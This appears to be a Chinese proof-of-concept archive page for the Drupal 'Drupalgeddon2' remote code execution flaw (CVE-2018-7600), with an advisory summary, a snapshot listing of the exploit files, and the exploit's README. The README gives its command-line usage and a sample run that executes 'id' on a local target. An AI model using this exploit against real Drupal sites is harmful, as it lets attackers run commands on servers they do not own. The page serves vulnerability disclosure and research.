关联漏洞
标题:
Drupal 安全漏洞
(CVE-2018-7600)
描述:Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。以下版本受到影响:Drupal 7.58之前版本,8.3.9之前的8.x版本,8.4.6之前的8.4.x版本,8.5.1之前的8.5.x版本。
介绍
# Drupal - Drupalgeddon2 (CVE 2018-7600)
```
$ python3 drupalgeddon.py -h
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
usage: drupalgeddon.py [-h] --url URL [--command COMMAND] [--function FUNCTION] [--test] [--proxy PROXY]
[!] This script exploits (CVE-2018-7600) a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.
optional arguments:
-h, --help show this help message and exit
--url URL, -u URL URL of target Drupal site (ex: http://target.com/)
--command COMMAND, -c COMMAND OS Command to execute
--function FUNCTION, -f FUNCTION Function to use as attack vector (default = passthru)
--test Test if target is vulnerable
--proxy PROXY, -p PROXY Configure a proxy in the format http://127.0.0.1:8080/ (default = none)
```
```
$ python3 drupalgeddon.py -u http://127.0.0.1 --test -c id
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
[+] Sending request to: http://127.0.0.1
[+] Testing if: http://127.0.0.1 is vulnerable
[!] Target is vulnerable to CVE-2018-7600
[+] Triggering exploit to execute: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
文件快照
[4.0K] /data/pocs/adad5aeb4d70d51095ef48f3b30e0bbf5837aae9
├── [3.5K] drupalgeddon2.py
└── [1.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。